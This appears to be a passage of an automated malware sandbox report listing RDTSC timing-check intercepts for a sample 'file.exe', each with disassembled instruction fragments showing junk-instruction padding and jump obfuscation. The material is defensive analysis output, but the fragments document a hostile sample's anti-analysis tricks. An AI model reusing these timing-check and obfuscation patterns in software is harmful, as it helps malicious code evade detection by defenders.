        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B64 second address: 4A10B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B68 second address: 4A10C13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a pushad 0x0000000b mov di, 81D8h 0x0000000f popad 0x00000010 je 00007F5979D58C73h 0x00000016 pushad 0x00000017 pushad 0x00000018 jmp 00007F5908B64E76h 0x0000001d pushfd 0x0000001e jmp 00007F5908B64E72h 0x00000023 sub esi, 58A5B368h 0x00000029 jmp 00007F5908B64E6Bh 0x0000002e popfd 0x0000002f popad 0x00000030 pushfd 0x00000031 jmp 00007F5908B64E78h 0x00000036 sub si, 05C8h 0x0000003b jmp 00007F5908B64E6Bh 0x00000040 popfd 0x00000041 popad 0x00000042 cmp dword ptr [ebp+08h], 00002000h 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c pushfd 0x0000004d jmp 00007F5908B64E72h 0x00000052 and cl, 00000028h 0x00000055 jmp 00007F5908B64E6Bh 0x0000005a popfd 0x0000005b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2098F second address: 4A20995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20995 second address: 4A20999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20999 second address: 4A20A47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F590909A3F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F590909A3F6h 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F590909A3F1h 0x00000019 adc si, 59B6h 0x0000001e jmp 00007F590909A3F1h 0x00000023 popfd 0x00000024 jmp 00007F590909A3F0h 0x00000029 popad 0x0000002a xchg eax, esi 0x0000002b jmp 00007F590909A3F0h 0x00000030 mov esi, dword ptr [ebp+0Ch] 0x00000033 jmp 00007F590909A3F0h 0x00000038 test esi, esi 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d mov bl, F5h 0x0000003f jmp 00007F590909A3F6h 0x00000044 popad 0x00000045 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20A47 second address: 4A20A4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20A4D second address: 4A20A51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20A51 second address: 4A20A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F5979D527C4h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20A65 second address: 4A20A69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20A69 second address: 4A20A6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20A6F second address: 4A20AEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F590909A3EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [75C7459Ch], 05h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F590909A3ECh 0x00000017 adc si, 7328h 0x0000001c jmp 00007F590909A3EBh 0x00000021 popfd 0x00000022 pushad 0x00000023 movzx esi, dx 0x00000026 mov ebx, 38AC1096h 0x0000002b popad 0x0000002c popad 0x0000002d je 00007F597A29FDCCh 0x00000033 pushad 0x00000034 movsx edx, ax 0x00000037 popad 0x00000038 xchg eax, esi 0x00000039 jmp 00007F590909A3EEh 0x0000003e push eax 0x0000003f jmp 00007F590909A3EBh 0x00000044 xchg eax, esi 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F590909A3F0h 0x0000004e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20AEC second address: 4A20AF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20AF2 second address: 4A20B03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F590909A3EDh 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20B2F second address: 4A20B38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 39F9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D7E3F0 second address: 5D7E3F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D7E3F5 second address: 5D7E3FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D7E3FA second address: 5D7E428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F590909A3E6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jnc 00007F590909A3ECh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F590909A3F1h 0x0000001c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D7E428 second address: 5D7E42C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EFE5D1 second address: 5EFE5D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EFE5D6 second address: 5EFE5DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EFDB62 second address: 5EFDB66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EFDD1A second address: 5EFDD2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jnc 00007F5908B64E66h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EFDD2D second address: 5EFDD31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EFDD31 second address: 5EFDD35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F0058D second address: 5F0066F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F590909A3F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov ecx, edi 0x0000000c push 00000000h 0x0000000e jng 00007F590909A3EBh 0x00000014 mov ecx, 2A566537h 0x00000019 push 6CA40161h 0x0000001e pushad 0x0000001f jmp 00007F590909A3EDh 0x00000024 jmp 00007F590909A3F2h 0x00000029 popad 0x0000002a xor dword ptr [esp], 6CA401E1h 0x00000031 push 00000003h 0x00000033 xor si, FE0Fh 0x00000038 push 00000000h 0x0000003a mov edx, dword ptr [ebp+122D3AFCh] 0x00000040 push 00000003h 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007F590909A3E8h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 00000019h 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c push 4FAE8B35h 0x00000061 jmp 00007F590909A3F0h 0x00000066 add dword ptr [esp], 705174CBh 0x0000006d mov ecx, edi 0x0000006f lea ebx, dword ptr [ebp+12456465h] 0x00000075 call 00007F590909A3F9h 0x0000007a mov ecx, dword ptr [ebp+122D39F8h] 0x00000080 pop ecx 0x00000081 push eax 0x00000082 push eax 0x00000083 push edx 0x00000084 jmp 00007F590909A3F4h 0x00000089 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F0070E second address: 5F00712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F00712 second address: 5F0071C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F590909A3E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F0071C second address: 5F00757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f push ecx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop ecx 0x00000013 popad 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 pushad 0x00000019 jc 00007F5908B64E72h 0x0000001f jmp 00007F5908B64E6Ch 0x00000024 push ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F00757 second address: 5F00769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jbe 00007F590909A3F0h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F00769 second address: 5F00793 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5908B64E79h 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F00793 second address: 5F00825 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F590909A3E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pop eax 0x0000000c jmp 00007F590909A3EEh 0x00000011 push 00000003h 0x00000013 sub dword ptr [ebp+122D1EAFh], edx 0x00000019 push 00000000h 0x0000001b add si, D6EBh 0x00000020 push 00000003h 0x00000022 push 6C063400h 0x00000027 jnc 00007F590909A3FAh 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 jmp 00007F590909A3F0h 0x00000035 popad 0x00000036 add dword ptr [esp], 53F9CC00h 0x0000003d mov edi, dword ptr [ebp+122D38A8h] 0x00000043 lea ebx, dword ptr [ebp+1245646Eh] 0x00000049 push 00000000h 0x0000004b push eax 0x0000004c call 00007F590909A3E8h 0x00000051 pop eax 0x00000052 mov dword ptr [esp+04h], eax 0x00000056 add dword ptr [esp+04h], 00000018h 0x0000005e inc eax 0x0000005f push eax 0x00000060 ret 0x00000061 pop eax 0x00000062 ret 0x00000063 movsx esi, si 0x00000066 xchg eax, ebx 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007F590909A3EDh 0x00000070 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F00825 second address: 5F0082B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F0082B second address: 5F00845 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jno 00007F590909A3ECh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F00845 second address: 5F00849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F008E6 second address: 5F00990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 xor dword ptr [esp], 7058B2D1h 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F590909A3E8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov esi, dword ptr [ebp+122D38E8h] 0x0000002d push 00000003h 0x0000002f sbb dx, E8CFh 0x00000034 push 00000000h 0x00000036 jmp 00007F590909A3F6h 0x0000003b jng 00007F590909A3EAh 0x00000041 mov si, C4F1h 0x00000045 push 00000003h 0x00000047 mov di, 7A61h 0x0000004b push 8970D800h 0x00000050 jmp 00007F590909A3F6h 0x00000055 xor dword ptr [esp], 4970D800h 0x0000005c mov dword ptr [ebp+122D1E49h], ecx 0x00000062 lea ebx, dword ptr [ebp+12456479h] 0x00000068 call 00007F590909A3EEh 0x0000006d mov edx, dword ptr [ebp+122D3B2Ch] 0x00000073 pop edx 0x00000074 xchg eax, ebx 0x00000075 push eax 0x00000076 push edx 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F00990 second address: 5F00996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F00996 second address: 5F0099B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F0099B second address: 5F009AA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop esi 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F22465 second address: 5F2246B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F2246B second address: 5F22494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F5908B64E77h 0x0000000c jmp 00007F5908B64E6Ah 0x00000011 popad 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF5A72 second address: 5EF5A94 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F590909A3F6h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF5A94 second address: 5EF5A98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F20453 second address: 5F20477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push edx 0x0000000a jmp 00007F590909A3F3h 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F20477 second address: 5F2047B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F2047B second address: 5F2047F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F2089F second address: 5F208B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5908B64E6Bh 0x0000000c ja 00007F5908B64E66h 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F20CBB second address: 5F20CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F590909A3F8h 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F20CDC second address: 5F20D11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b jmp 00007F5908B64E79h 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F2100A second address: 5F21010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F21173 second address: 5F21182 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnc 00007F5908B64E66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F21182 second address: 5F21188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F21188 second address: 5F2118D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F21440 second address: 5F21444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F21444 second address: 5F21466 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F5908B64E74h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F21466 second address: 5F2147F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F590909A3F5h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F2147F second address: 5F21483 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F21483 second address: 5F21493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F590909A3E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F21493 second address: 5F21499 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF404F second address: 5EF4053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF4053 second address: 5EF4068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F5908B64E6Dh 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F215C0 second address: 5F215CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F215CB second address: 5F215E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 jnl 00007F5908B64E66h 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jl 00007F5908B64E66h 0x0000001e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F215E9 second address: 5F215F3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F590909A3E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F21B6A second address: 5F21B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F2200D second address: 5F22011 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F22011 second address: 5F2201C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F2201C second address: 5F22023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F22023 second address: 5F22042 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5908B64E7Ah 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F247A3 second address: 5F247A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F2663E second address: 5F2668E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E78h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F5908B64E6Eh 0x00000011 jmp 00007F5908B64E73h 0x00000016 popad 0x00000017 pushad 0x00000018 jnp 00007F5908B64E66h 0x0000001e jno 00007F5908B64E66h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE4F39 second address: 5EE4F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F2D3C0 second address: 5F2D3D4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5908B64E66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F5908B64E66h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F2D3D4 second address: 5F2D3D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F2D695 second address: 5F2D69B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F2D69B second address: 5F2D69F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F2D69F second address: 5F2D6AA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F2D6AA second address: 5F2D6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F2D6B3 second address: 5F2D6B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F2D802 second address: 5F2D82E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F590909A3ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c jmp 00007F590909A3F0h 0x00000011 pop edi 0x00000012 pushad 0x00000013 jng 00007F590909A3E6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F2F63D second address: 5F2F641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F2F9A5 second address: 5F2F9AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
